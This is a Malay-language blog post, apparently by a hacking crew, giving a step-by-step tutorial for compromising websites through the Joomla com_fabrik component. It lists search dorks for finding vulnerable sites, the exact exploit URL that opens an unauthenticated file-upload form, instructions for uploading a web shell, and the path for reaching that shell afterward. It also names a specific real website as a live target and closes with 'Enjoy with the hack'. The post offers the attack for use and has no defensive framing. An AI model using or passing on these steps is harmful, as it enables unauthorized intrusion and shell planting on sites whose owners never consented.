Assalamualaikum dan salam sejahtera .
Harini aku nak ajar korang cara hack laman web menggunakan method com_fabrik :)
Mula-mula cari website vuln dengan dork ini :
- inurl:index.php?option=com_fabrik
- index.php?option=com_fabrik
Dork boleh dikembangkan lagi :)
Ok . Lepas dah jumpa satu website , korang letak exploit ni di belakang laman web itu :
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contohnya macam ni www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Lepas korang tekan enter , nanti akan keluar benda seperti ditunjukkan dalam gambar :
Takde benda itu ? Jangan lengah lagi .. Exit je laman web tu xD
Kalau ada alhamdulillah :) Sekarang korang tekan choose file tu dan upload lah shell korang . Tapi tak semua laman web boleh upload shell :) Kebanyakkannya boleh upload txt , htm , html bergantung kepada laman web yang korang jumpa :D
Untuk melihat shell yang korang dah upload , letak /media/namashell.php dekat belakang laman web :)
Itu sahaja tutorial daripada aku .
Live Website : http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
ok .. Enjoy with the hack !
Greets : Black CyberSec Crew
Rating:
100%
based on 10 ratings.
5 user reviews.



.jpg)


0 comments:
Post a Comment